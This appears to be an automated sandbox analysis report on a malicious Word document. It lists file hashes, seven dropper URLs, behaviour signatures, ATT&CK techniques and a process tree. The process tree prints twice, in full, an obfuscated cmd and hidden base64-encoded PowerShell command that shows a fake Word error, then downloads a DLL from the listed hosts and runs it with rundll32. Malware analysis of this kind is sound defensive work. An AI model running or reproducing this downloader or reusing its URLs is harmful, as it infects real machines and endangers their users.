Analysis

  • max time kernel
    56s
  • max time network
    60s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    14-01-2021 14:50

General

  • Target

    file B_252134.doc

  • Size

    139KB

  • MD5

    5755e717ca2ea862e1ac7b6b16e51231

  • SHA1

    0b72f94a91bbae534835b094bd619b9ad964eeab

  • SHA256

    9df93467bf67b571d11380a8fb29d1a2d82690b2797b73641a513802a4dccd80

  • SHA512

    049bd35c7d64a55e4f476297df4bb80c2a477f87b2e42f98bdb2e9ee881c96d52532993e700f7dfad4e02b74f5e4181eb8d92d1593168102818e3c53114f830b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://smkbudiagung.com/wp-content/VoPg04/

exe.dropper

https://ats-tx.com/old/f1X/

exe.dropper

http://avanttipisos.com.br/catalogo-virtual/U/

exe.dropper

http://mpeakecreations.co.za/cgi-bin/vVk1rw/

exe.dropper

http://adres-ug.ru/wp-admin/IItD/

exe.dropper

https://theraven.pk/overwolf-r6-vdace/UH4fL/

exe.dropper

http://bhar.com.br/elementos/MQfB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\file B_252134.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:980
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAWgA1AGUASQBXACAAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ACIALQBGACAAJwB0AG8AJwAsACcARABpAFIAZQBjACcALAAnAHIAeQAnACwAJwBpAG8ALgAnACwAJwBTAHkAcwBUAEUATQAuACcAKQA7ACAAIAAgACAAJABqAFIAdAAgACAAPQBbAFQAeQBwAEUAXQAoACIAewAzAH0AewAxAH0AewA3AH0AewA1AH0AewA4AH0AewA2AH0AewAwAH0AewA0AH0AewAyAH0AewA5AH0AIgAgAC0ARgAnAFAAJwAsACcARQB0ACcALAAnAEcAJwAsACcAUwBZAHMAdABFAG0ALgBuACcALAAnAE8ASQBuAHQATQBhAE4AQQAnACwAJwBFACcALAAnAEMARQAnACwAJwAuAHMAJwAsACcAUgBWAEkAJwAsACcARQBSACcAKQAgACAAOwAgACAAJABFAG0AYwB6ADAAMgB0AD0AJABKADEANABLACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADYAMQBNADsAJABRADgAOABSAD0AKAAnAEwAMAAnACsAJwAwAFgAJwApADsAIAAoACAAVgBBAHIAaQBhAGIAbABlACAAegA1AEUAaQBXACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAHIAZQBBAFQARQBkAGkAcgBgAGUAYABjAGAAVABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBuAG8AWgAnACsAJwBYACcAKQArACgAJwBxACcAKwAnAHAAbwAnACkAKwAoACcAMwAnACsAJwBwAHUAJwApACsAKAAnAG4AJwArACcAbwBaAEUAaAByAHQAeAAnACsAJwB0ACcAKQArACgAJwBkAG4AbwAnACsAJwBaACcAKQApACAAIAAtAEMAcgBlAFAATABhAEMARQAoACcAbgAnACsAJwBvAFoAJwApACwAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVAA0AF8AUAA9ACgAJwBLACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAOwAgACgAIABnAGkAIAAoACIAdgBhAHIAIgArACIAaQBhAEIATABlACIAKwAiADoAIgArACIASgBSAHQAIgApACAAKQAuAHYAYQBMAFUAZQA6ADoAIgBTAGUAQwB1AHIAaQBUAGAAWQBgAHAAYABSAE8AVABvAGAAQwBvAEwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAFIAOAAzAE8APQAoACcAWAAnACsAKAAnADUAJwArACcAMgBCACcAKQApADsAJABaAHkANAA4AGsAZgByACAAPQAgACgAKAAnAFgAJwArACcANQBfACcAKQArACcASgAnACkAOwAkAFgAOAA2AEMAPQAoACcAUgA5ACcAKwAnADcAWQAnACkAOwAkAEUAbwB3ADQAeABmADIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBYAHEAcABvADMAJwArACcAcAB1AHsAJwArACcAMAB9AEUAaAByAHQAeAAnACsAJwB0ACcAKwAnAGQAewAwAH0AJwApACAAIAAtAEYAIABbAEMAaABBAHIAXQA5ADIAKQArACQAWgB5ADQAOABrAGYAcgArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEEAMgA4AEgAPQAoACcAUAAnACsAKAAnADUAJwArACcANABOACcAKQApADsAJABSAGQANABrAGQAcgBoAD0AKAAoACcAQQBdAFsAJwArACcAcQBbACcAKQArACcARAAnACsAJwBzADoAJwArACgAJwAvAC8AcwBtACcAKwAnAGsAYgAnACsAJwB1AGQAaQBhAGcAJwApACsAKAAnAHUAJwArACcAbgBnAC4AJwApACsAJwBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAKAAnAGMAbwBuACcAKwAnAHQAJwApACsAJwBlACcAKwAoACcAbgAnACsAJwB0AC8AJwApACsAKAAnAFYAbwAnACsAJwBQAGcAMAA0ACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACcAXQBbACcAKwAnAHEAWwAnACsAKAAnAEQAcwAnACsAJwA6AC8ALwBhAHQAcwAtACcAKQArACgAJwB0AHgAJwArACcALgBjAG8AbQAnACsAJwAvAG8AJwApACsAJwBsAGQAJwArACgAJwAvACcAKwAnAGYAMQAnACkAKwAoACcAWAAvAEAAJwArACcAQQAnACkAKwAnAF0AWwAnACsAKAAnAHEAWwAnACsAJwBEACcAKQArACgAJwA6AC8ALwBhAHYAYQAnACsAJwBuAHQAdABpACcAKwAnAHAAJwApACsAKAAnAGkAcwBvAHMAJwArACcALgAnACsAJwBjACcAKQArACcAbwBtACcAKwAnAC4AYgAnACsAKAAnAHIALwAnACsAJwBjACcAKwAnAGEAdAAnACsAJwBhAGwAbwAnACsAJwBnAG8ALQB2AGkAcgB0ACcAKwAnAHUAYQAnACkAKwAnAGwALwAnACsAKAAnAFUALwBAAEEAJwArACcAXQAnACkAKwAoACcAWwBxACcAKwAnAFsAJwApACsAKAAnAEQAOgAvACcAKwAnAC8AbQBwAGUAYQBrACcAKQArACgAJwBlAGMAcgBlACcAKwAnAGEAJwApACsAJwB0AGkAJwArACgAJwBvACcAKwAnAG4AcwAnACkAKwAnAC4AYwAnACsAJwBvAC4AJwArACcAegBhACcAKwAoACcALwBjACcAKwAnAGcAJwApACsAJwBpAC0AJwArACgAJwBiAGkAJwArACcAbgAvACcAKwAnAHYAVgBrADEAJwApACsAJwByAHcAJwArACcALwBAACcAKwAoACcAQQBdAFsAJwArACcAcQBbAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwArACcAZAByAGUAcwAnACsAJwAtAHUAZwAnACkAKwAoACcALgByACcAKwAnAHUALwAnACkAKwAoACcAdwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtAGkAbgAvAEkASQAnACsAJwB0AEQAJwArACcALwAnACsAJwBAAEEAJwApACsAKAAnAF0AWwBxAFsAJwArACcARABzACcAKQArACgAJwA6AC8ALwB0ACcAKwAnAGgAZQByAGEAdgAnACsAJwBlAG4ALgBwAGsAJwApACsAKAAnAC8AJwArACcAbwB2AGUAJwApACsAKAAnAHIAdwBvACcAKwAnAGwAZgAtAHIANgAnACkAKwAoACcALQB2AGQAYQBjAGUAJwArACcALwBVAEgANAAnACsAJwBmAEwALwBAACcAKQArACgAJwBBAF0AWwBxAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAYgBoAGEAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAuAGIAJwArACcAcgAvACcAKwAnAGUAJwApACsAJwBsACcAKwAoACcAZQBtACcAKwAnAGUAJwArACcAbgB0AG8AcwAvAE0AJwApACsAKAAnAFEAJwArACcAZgBCAC8AJwApACkALgAiAHIARQBgAFAAbABhAGMARQAiACgAKAAnAEEAJwArACcAXQAnACsAKAAnAFsAcQAnACsAJwBbAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZABzACcAKwAoACcAZQAnACsAJwB3AGYAJwApACkALAAoACgAJwB3ACcAKwAnAGUAdgAnACkAKwAnAHcAZQAnACkAKQAsACgAKAAnAGEAZQAnACsAJwBmACcAKQArACcAZgAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACkAWwAyAF0AKQAuACIAcwBwAEwAYABJAHQAIgAoACQAWgA1ADIASgAgACsAIAAkAEUAbQBjAHoAMAAyAHQAIAArACAAJABaADkAMABJACkAOwAkAEkANQA3AFYAPQAoACgAJwBTACcAKwAnADMAMQAnACkAKwAnAFEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABFADkAMQA1AGEAMgBuACAAaQBuACAAJABSAGQANABrAGQAcgBoACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQAnACsAJwBPAGIAagBlAGMAdAAnACkAIABTAHkAcwB0AEUATQAuAE4ARQBUAC4AdwBFAGIAYwBMAEkAZQBOAHQAKQAuACIARABvAGAAVwBuAEwAYABvAGEAZABGAGAASQBsAGUAIgAoACQARQA5ADEANQBhADIAbgAsACAAJABFAG8AdwA0AHgAZgAyACkAOwAkAFgAMQA0AFQAPQAoACcAVQAnACsAKAAnADgAOQAnACsAJwBVACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEUAbwB3ADQAeABmADIAKQAuACIAbABlAG4AYABnAHQASAAiACAALQBnAGUAIAA0ADkANgAwADQAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsACcAKwAnAGwAMwAyACcAKQAgACQARQBvAHcANAB4AGYAMgAsACgAJwBTACcAKwAoACcAaABvAHcAJwArACcARABpACcAKwAnAGEAbABvACcAKQArACcAZwBBACcAKQAuACIAdABPAGAAcwBgAFQAcgBpAE4AZwAiACgAKQA7ACQAQgA1ADcAVQA9ACgAKAAnAFEAMgAnACsAJwAwACcAKQArACcAQgAnACkAOwBiAHIAZQBhAGsAOwAkAFgANAA4AEwAPQAoACcATwAnACsAKAAnADAAJwArACcAMgBPACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMADgAMwBWAD0AKAAnAEQANAAnACsAJwAxAEwAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:196
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgACQAWgA1AGUASQBXACAAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ACIALQBGACAAJwB0AG8AJwAsACcARABpAFIAZQBjACcALAAnAHIAeQAnACwAJwBpAG8ALgAnACwAJwBTAHkAcwBUAEUATQAuACcAKQA7ACAAIAAgACAAJABqAFIAdAAgACAAPQBbAFQAeQBwAEUAXQAoACIAewAzAH0AewAxAH0AewA3AH0AewA1AH0AewA4AH0AewA2AH0AewAwAH0AewA0AH0AewAyAH0AewA5AH0AIgAgAC0ARgAnAFAAJwAsACcARQB0ACcALAAnAEcAJwAsACcAUwBZAHMAdABFAG0ALgBuACcALAAnAE8ASQBuAHQATQBhAE4AQQAnACwAJwBFACcALAAnAEMARQAnACwAJwAuAHMAJwAsACcAUgBWAEkAJwAsACcARQBSACcAKQAgACAAOwAgACAAJABFAG0AYwB6ADAAMgB0AD0AJABKADEANABLACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADYAMQBNADsAJABRADgAOABSAD0AKAAnAEwAMAAnACsAJwAwAFgAJwApADsAIAAoACAAVgBBAHIAaQBhAGIAbABlACAAegA1AEUAaQBXACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAHIAZQBBAFQARQBkAGkAcgBgAGUAYABjAGAAVABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBuAG8AWgAnACsAJwBYACcAKQArACgAJwBxACcAKwAnAHAAbwAnACkAKwAoACcAMwAnACsAJwBwAHUAJwApACsAKAAnAG4AJwArACcAbwBaAEUAaAByAHQAeAAnACsAJwB0ACcAKQArACgAJwBkAG4AbwAnACsAJwBaACcAKQApACAAIAAtAEMAcgBlAFAATABhAEMARQAoACcAbgAnACsAJwBvAFoAJwApACwAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVAA0AF8AUAA9ACgAJwBLACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAOwAgACgAIABnAGkAIAAoACIAdgBhAHIAIgArACIAaQBhAEIATABlACIAKwAiADoAIgArACIASgBSAHQAIgApACAAKQAuAHYAYQBMAFUAZQA6ADoAIgBTAGUAQwB1AHIAaQBUAGAAWQBgAHAAYABSAE8AVABvAGAAQwBvAEwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAFIAOAAzAE8APQAoACcAWAAnACsAKAAnADUAJwArACcAMgBCACcAKQApADsAJABaAHkANAA4AGsAZgByACAAPQAgACgAKAAnAFgAJwArACcANQBfACcAKQArACcASgAnACkAOwAkAFgAOAA2AEMAPQAoACcAUgA5ACcAKwAnADcAWQAnACkAOwAkAEUAbwB3ADQAeABmADIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBYAHEAcABvADMAJwArACcAcAB1AHsAJwArACcAMAB9AEUAaAByAHQAeAAnACsAJwB0ACcAKwAnAGQAewAwAH0AJwApACAAIAAtAEYAIABbAEMAaABBAHIAXQA5ADIAKQArACQAWgB5ADQAOABrAGYAcgArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEEAMgA4AEgAPQAoACcAUAAnACsAKAAnADUAJwArACcANABOACcAKQApADsAJABSAGQANABrAGQAcgBoAD0AKAAoACcAQQBdAFsAJwArACcAcQBbACcAKQArACcARAAnACsAJwBzADoAJwArACgAJwAvAC8AcwBtACcAKwAnAGsAYgAnACsAJwB1AGQAaQBhAGcAJwApACsAKAAnAHUAJwArACcAbgBnAC4AJwApACsAJwBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAKAAnAGMAbwBuACcAKwAnAHQAJwApACsAJwBlACcAKwAoACcAbgAnACsAJwB0AC8AJwApACsAKAAnAFYAbwAnACsAJwBQAGcAMAA0ACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACcAXQBbACcAKwAnAHEAWwAnACsAKAAnAEQAcwAnACsAJwA6AC8ALwBhAHQAcwAtACcAKQArACgAJwB0AHgAJwArACcALgBjAG8AbQAnACsAJwAvAG8AJwApACsAJwBsAGQAJwArACgAJwAvACcAKwAnAGYAMQAnACkAKwAoACcAWAAvAEAAJwArACcAQQAnACkAKwAnAF0AWwAnACsAKAAnAHEAWwAnACsAJwBEACcAKQArACgAJwA6AC8ALwBhAHYAYQAnACsAJwBuAHQAdABpACcAKwAnAHAAJwApACsAKAAnAGkAcwBvAHMAJwArACcALgAnACsAJwBjACcAKQArACcAbwBtACcAKwAnAC4AYgAnACsAKAAnAHIALwAnACsAJwBjACcAKwAnAGEAdAAnACsAJwBhAGwAbwAnACsAJwBnAG8ALQB2AGkAcgB0ACcAKwAnAHUAYQAnACkAKwAnAGwALwAnACsAKAAnAFUALwBAAEEAJwArACcAXQAnACkAKwAoACcAWwBxACcAKwAnAFsAJwApACsAKAAnAEQAOgAvACcAKwAnAC8AbQBwAGUAYQBrACcAKQArACgAJwBlAGMAcgBlACcAKwAnAGEAJwApACsAJwB0AGkAJwArACgAJwBvACcAKwAnAG4AcwAnACkAKwAnAC4AYwAnACsAJwBvAC4AJwArACcAegBhACcAKwAoACcALwBjACcAKwAnAGcAJwApACsAJwBpAC0AJwArACgAJwBiAGkAJwArACcAbgAvACcAKwAnAHYAVgBrADEAJwApACsAJwByAHcAJwArACcALwBAACcAKwAoACcAQQBdAFsAJwArACcAcQBbAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwArACcAZAByAGUAcwAnACsAJwAtAHUAZwAnACkAKwAoACcALgByACcAKwAnAHUALwAnACkAKwAoACcAdwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtAGkAbgAvAEkASQAnACsAJwB0AEQAJwArACcALwAnACsAJwBAAEEAJwApACsAKAAnAF0AWwBxAFsAJwArACcARABzACcAKQArACgAJwA6AC8ALwB0ACcAKwAnAGgAZQByAGEAdgAnACsAJwBlAG4ALgBwAGsAJwApACsAKAAnAC8AJwArACcAbwB2AGUAJwApACsAKAAnAHIAdwBvACcAKwAnAGwAZgAtAHIANgAnACkAKwAoACcALQB2AGQAYQBjAGUAJwArACcALwBVAEgANAAnACsAJwBmAEwALwBAACcAKQArACgAJwBBAF0AWwBxAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAYgBoAGEAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAuAGIAJwArACcAcgAvACcAKwAnAGUAJwApACsAJwBsACcAKwAoACcAZQBtACcAKwAnAGUAJwArACcAbgB0AG8AcwAvAE0AJwApACsAKAAnAFEAJwArACcAZgBCAC8AJwApACkALgAiAHIARQBgAFAAbABhAGMARQAiACgAKAAnAEEAJwArACcAXQAnACsAKAAnAFsAcQAnACsAJwBbAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZABzACcAKwAoACcAZQAnACsAJwB3AGYAJwApACkALAAoACgAJwB3ACcAKwAnAGUAdgAnACkAKwAnAHcAZQAnACkAKQAsACgAKAAnAGEAZQAnACsAJwBmACcAKQArACcAZgAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACkAWwAyAF0AKQAuACIAcwBwAEwAYABJAHQAIgAoACQAWgA1ADIASgAgACsAIAAkAEUAbQBjAHoAMAAyAHQAIAArACAAJABaADkAMABJACkAOwAkAEkANQA3AFYAPQAoACgAJwBTACcAKwAnADMAMQAnACkAKwAnAFEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABFADkAMQA1AGEAMgBuACAAaQBuACAAJABSAGQANABrAGQAcgBoACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQAnACsAJwBPAGIAagBlAGMAdAAnACkAIABTAHkAcwB0AEUATQAuAE4ARQBUAC4AdwBFAGIAYwBMAEkAZQBOAHQAKQAuACIARABvAGAAVwBuAEwAYABvAGEAZABGAGAASQBsAGUAIgAoACQARQA5ADEANQBhADIAbgAsACAAJABFAG8AdwA0AHgAZgAyACkAOwAkAFgAMQA0AFQAPQAoACcAVQAnACsAKAAnADgAOQAnACsAJwBVACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEUAbwB3ADQAeABmADIAKQAuACIAbABlAG4AYABnAHQASAAiACAALQBnAGUAIAA0ADkANgAwADQAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsACcAKwAnAGwAMwAyACcAKQAgACQARQBvAHcANAB4AGYAMgAsACgAJwBTACcAKwAoACcAaABvAHcAJwArACcARABpACcAKwAnAGEAbABvACcAKQArACcAZwBBACcAKQAuACIAdABPAGAAcwBgAFQAcgBpAE4AZwAiACgAKQA7ACQAQgA1ADcAVQA9ACgAKAAnAFEAMgAnACsAJwAwACcAKQArACcAQgAnACkAOwBiAHIAZQBhAGsAOwAkAFgANAA4AEwAPQAoACcATwAnACsAKAAnADAAJwArACcAMgBPACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMADgAMwBWAD0AKAAnAEQANAAnACsAJwAxAEwAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xqpo3pu\Ehrtxtd\X5_J.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1308
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xqpo3pu\Ehrtxtd\X5_J.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:4060
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mivzf\pfuz.dcu",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:3480

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Xqpo3pu\Ehrtxtd\X5_J.dll
      MD5

      531576e8cbde29e4d9dc1229291ef7a5

      SHA1

      4e77b02d31adfea05b6e1e15ce668ddbd7edea86

      SHA256

      d7ec7166c632c003cc863298c7bd9876d8fca5b63308e42e31eff9c0a56ad9f5

      SHA512

      8f35ef440ff02378ef6ea9cfef04fbc755590992fe68b15056ff59dca12c538bd54988117b38606a495bb365887baf09037732afbf54625e29a11e075e77438f

    • \Users\Admin\Xqpo3pu\Ehrtxtd\X5_J.dll
      MD5

      531576e8cbde29e4d9dc1229291ef7a5

      SHA1

      4e77b02d31adfea05b6e1e15ce668ddbd7edea86

      SHA256

      d7ec7166c632c003cc863298c7bd9876d8fca5b63308e42e31eff9c0a56ad9f5

      SHA512

      8f35ef440ff02378ef6ea9cfef04fbc755590992fe68b15056ff59dca12c538bd54988117b38606a495bb365887baf09037732afbf54625e29a11e075e77438f

    • memory/732-3-0x0000000000000000-mapping.dmp
    • memory/980-2-0x00007FFA13B30000-0x00007FFA14167000-memory.dmp
      Filesize

      6.2MB

    • memory/1276-4-0x0000000000000000-mapping.dmp
    • memory/1276-5-0x00007FFA089A0000-0x00007FFA0938C000-memory.dmp
      Filesize

      9.9MB

    • memory/1276-6-0x0000023E7D870000-0x0000023E7D871000-memory.dmp
      Filesize

      4KB

    • memory/1276-7-0x0000023E7DA20000-0x0000023E7DA21000-memory.dmp
      Filesize

      4KB

    • memory/1308-8-0x0000000000000000-mapping.dmp
    • memory/3480-12-0x0000000000000000-mapping.dmp
    • memory/4060-10-0x0000000000000000-mapping.dmp